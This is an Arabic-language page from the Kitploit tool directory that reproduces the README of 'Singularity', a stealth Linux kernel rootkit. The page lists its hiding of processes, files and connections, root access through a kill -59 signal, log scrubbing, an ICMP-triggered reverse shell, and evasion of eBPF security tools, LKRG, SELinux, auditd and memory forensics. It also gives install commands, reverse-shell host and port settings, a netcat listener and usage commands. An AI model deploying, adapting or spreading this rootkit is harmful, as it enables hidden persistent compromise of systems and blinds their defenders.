Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/matheuzsecurity/singularity
تصعيد الامتيازات
GitHubmatheuzsecurity/singularity

Singularity

روتكيت خفي لنواة لينكس (LKM) لإصدارات النواة 6.x مع إخفاء متقدم للعمليات والشبكة، وتصعيد الصلاحيات، وتفادٍ شامل لأدوات أمان eBPF وLKRG وSELinux والتحليل الجنائي للذاكرة.

عرض المستودع
1.7k19021منذ 8 أيامتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Singularity - روتكيت نواة لينكس خفي

Singularity Rootkit

"هل نعطي الطب الشرعي بعض العمل؟"

هذا المشروع مستوحى من امرأة مميزة جدًا بالنسبة لي: Mocinha

Singularity هو روتكيت قوي لوحدة نواة لينكس (LKM) مصمم للأنوية الحديثة 6.x. يوفر قدرات تمويه شاملة من خلال اعتراض استدعاءات النظام المتقدم عبر بنية ftrace.

المقال البحثي الكامل (نسخة قديمة): Singularity: روتكيت نواة لينكس - الزعيم الأخير

دراسة حالة لتجاوز EDR: اختراق Elastic EDR باستخدام Singularity

فيديو إثبات المفهوم: Singularity ضد أدوات أمن eBPF: Singularity ضد أدوات أمن eBPF

اختراق أمان eBPF باستخدام خطافات Singularity: اختراق eBPF

ما هي Singularity؟

Singularity هي روتكيت متطور يعمل على مستوى النواة، ويوفر:

  • إخفاء العمليات: اجعل أي عملية غير مرئية تمامًا للنظام
  • إخفاء الملفات والأدلة: إخفاء الملفات باستخدام مطابقة الأنماط
  • تمويه الشبكة: إخفاء اتصالات TCP/UDP والمنافذ وإدخالات conntrack
  • تصعيد الامتيازات: وصول جذر فوري عبر الإشارات
  • تعقيم السجلات: تصفية سجلات النواة وسجلات النظام في الوقت الفعلي
  • الإخفاء الذاتي: إزالة نفسه من قوائم الوحدات ومراقبة النظام
  • الوصول عن بُعد: قشرة عكسية تُطلق عبر ICMP مع إخفاء تلقائي
  • مكافحة الكشف: تجاوز أدوات الأمن الزمنية القائمة على eBPF (Falco وTracee)، وتجاوز حارس وقت تشغيل نواة لينكس (LKRG)، ومنع محاولات تجاوز io_uring
  • تجنب التدقيق: إسقاط رسائل التدقيق للعمليات المخفية على مستوى netlink مع تتبع الإحصائيات وتصفية inode للمآخذ
  • تجنب فحص الذاكرة: تصفية /proc/kcore و/proc/kallsyms و/proc/vmallocinfo
  • تصفية Cgroup: تصفية معرفات العمليات المخفية من cgroup.procs
  • تجنب Syslog: اعتراض do_syslog لتصفية الوصول إلى المخزن المؤقت الحلقي للنواة عبر klogctl()
  • تجنب Debugfs: تصفية مخرجات أدوات مثل debugfs التي تقرأ أجهزة الكتل الخام
  • تصفية Conntrack: إخفاء الاتصالات من /proc/net/nf_conntrack واستعلامات netlink SOCK_DIAG/NETFILTER
  • تجنب SELinux: تجاوز تلقائي لوضع الإلزام في SELinux عند تشغيل ICMP
  • تجاوز LKRG: تجاوز آليات الكشف في حارس وقت تشغيل نواة لينكس
  • تجاوز أمان eBPF: إخفاء العمليات عن أدوات الأمن الزمنية القائمة على eBPF (Falco وTracee)

الميزات

  • رفع الامتيازات عبر الإشارات (kill -59)
  • إخفاء كامل للعمليات عن /proc وأدوات المراقبة
  • إخفاء نظام الملفات القائم على الأنماط للملفات والأدلة
  • إخفاء اتصالات الشبكة عن netstat وss وconntrack ومحللات الحزم
  • تصفية netlink متقدمة (رسائل SOCK_DIAG وNETFILTER/conntrack)
  • تصفية سجلات النواة في الوقت الفعلي لـ dmesg وjournalctl وklogctl
  • إخفاء ذاتي للوحدة عن lsmod و/sys/module
  • تطبيع تلقائي لعلم تلطيخ النواة
  • تصفية بيانات BPF لمنع الكشف القائم على eBPF
  • حماية io_uring ضد تجاوز الإدخال/الإخراج غير المتزامن
  • إخفاء رسائل النواة وسجلات النظام
  • تجنب كاشفات الروتكيت القياسية (unhide وchkrootkit وrkhunter)
  • تتبع وإخفاء تلقائي للعمليات الفرعية عبر خطافات tracepoint
  • دعم متعدد البنى (x64 + ia32)
  • تصفية على مستوى حزم الشبكة مع حماية المآخذ الخام
  • حماية ضد جميع أشكال إدخال/إخراج الملفات (read وwrite وsplice وsendfile وtee وcopy_file_range)
  • تصفية رسائل التدقيق على مستوى netlink مع تتبع الإحصائيات لتجنب كشف auditd
  • تتبع inode للمآخذ لإخفاء شبكة شامل
  • تصفية معرفات عمليات Cgroup لمنع الكشف عبر /sys/fs/cgroup/*/cgroup.procs
  • حظر netlink الخاص بـ TaskStats لمنع تعداد معرفات العمليات
  • تصفية /proc/kcore لتجنب أدوات فحص الذاكرة (Volatility وcrash وgdb)
  • خطاف do_syslog لتصفية klogctl() ومنع تسريبات المخزن المؤقت الحلقي للنواة
  • تصفية مخرجات أجهزة الكتل لتجنب debugfs وأدوات فحص الأقراص المماثلة
  • تصفية مخرجات journalctl -k عبر خطاف write
  • قدرة تجاوز وضع الإلزام في SELinux للقذائف المُطلقة عبر ICMP
  • تجاوز فحوصات سلامة LKRG للعمليات المخفية
  • إخفاء أحداث Falco عبر المخزن المؤقت الحلقي لـ BPF واعتراض أحداث perf

التثبيت

المتطلبات الأساسية

  • نواة لينكس 6.x
  • ترويسات النواة للنواة قيد التشغيل لديك
  • برمجتا GCC وMake
  • وصول الجذر

التثبيت السريع```bash

cd /dev/shm git clone https://github.com/MatheuZSecurity/Singularity cd Singularity sudo bash setup.sh cd ..

هذا كل شيء. تقوم الوحدة تلقائيًا بما يلي:
- تخفي نفسها من lsmod و /proc/modules و /sys/module
- تمسح أعلام taint الخاصة بالنواة
- تصفية السلاسل الحساسة من dmesg و journalctl -k و klogctl
- تبدأ بحماية ملفاتك وعملياتك المخفية

### ملاحظات مهمة

**تقوم الوحدة بإخفاء نفسها تلقائيًا بعد التحميل**

**لا توجد ميزة إلغاء التحميل - يلزم إعادة التشغيل للإزالة**

**اختبرها في جهاز افتراضي أولاً - لا يمكن إزالتها دون إعادة تشغيل**

## الإعداد

### تعيين عنوان IP والمنفذ الخاص بالخادم

**عدّل `include/core.h`:**```c
#define YOUR_SRV_IP "192.168.1.100"  // Change this to your server IP
#define YOUR_SRV_IPv6 { .s6_addr = { [15] = 1 } }  // IPv6 if needed

عدّل modules/icmp.c:

/*
 * Edit the remote host to your IP address
 */
#define REMOTE_HOST "127.0.0.1"

/*
 * Change the remote port
 */
#define REMOTE_PORT 4444
  • غيّر المضيف البعيد الافتراضي إلى عنوان IP الخاص بك.
  • غيّر المنفذ الافتراضي إلى المنفذ الذي تريده.

إذا حاولت تنفيذ هذه الوحدة، سترى أن الوحدة تحاول الاتصال بخادم وتنتظر البيانات الواردة. في الخطوة التالية، سندرس كيفية إنشاء الخادم والمعالج الخاص بذلك. أيضًا، عند تشغيل الوحدة، يتم تشفير أول بايتات يتم نقلها بين العميل والخادم بمفتاح XOR ثابت سنعرّفه أدناه (collect.c).```c #define SRV_PORT "8081" // Change this to your desired port

**عدّل `modules/bpf_hook.c`:**```c
#define HIDDEN_PORT 8081  // Must match SRV_PORT

عدّل modules/hiding_tcp.c:```c #define PORT 8081 // Must match SRV_PORT

**مهم**: يجب أن تتطابق جميع تعريفات المنافذ لضمان إخفاء الشبكة بشكل صحيح ووظيفة الصدفة العكسية عبر ICMP.

## الاستخدام

### إخفاء العمليات```bash
# Hide current shell
kill -59 $$

# Hide specific process
kill -59 <PID>

ستكون العملية غير مرئية لـ ps وtop وhtop و/proc وجميع أدوات المراقبة. جميع العمليات الفرعية يتم تتبعها وإخفاؤها تلقائيًا.

إخفاء الملفات والدلائل

الملفات المطابقة لأنماطك المكوّنة يتم إخفاؤها تلقائيًا:```bash mkdir singularity echo "secret" > singularity/data.txt

Invisible to ls, find, locate

ls -la | grep singularity

(no output)

But you can still access it

cat singularity/data.txt

secret

cd is blocked for security

cd singularity

bash: cd: singularity: No such file or directory

<p align="center">
<img src="https://assets.kitploit.com/production/public/readmes/10489/13713f834a730a67b38b024c092d77eb111a7d38e2fa0ac16a8f36ffd3506f90.png">
</p>

### كن الجذر

**الطريقة القائمة على الإشارات:**```bash
kill -59 $$
id  # uid=0(root)

إخفاء اتصالات الشبكة

يتم إخفاء الاتصالات على المنفذ المُكوّن لديك (الافتراضي: 8081) تلقائيًا:```bash nc -lvnp 8081

Invisible to all monitoring

ss -tulpn | grep 8081 # (no output) netstat -tulpn | grep 8081 # (no output) lsof -i :8081 # (no output) cat /proc/net/nf_conntrack | grep 8081 # (no output)

Even advanced netlink queries are filtered

ss -tapen | grep 8081 # (no output) conntrack -L | grep 8081 # (no output)

تُسقَط الحزم على مستوى المقبس الخام (tpacket_rcv) وتكون مخفية عن:
- واجهات /proc/net/* (tcp, tcp6, udp, udp6)
- /proc/net/nf_conntrack
- استعلامات Netlink SOCK_DIAG (المستخدمة من قبل ss, lsof)
- رسائل Netlink NETFILTER/conntrack (المستخدمة من قبل أداة conntrack)

<p align="center">
<img src="https://assets.kitploit.com/production/public/readmes/10489/a77a916efc8ee8b9091b3a0ef3acfde44eff570bc022477a3906fac1f623993f.png">
</p>

### شل عكسي عبر ICMP
تنزيل الأداة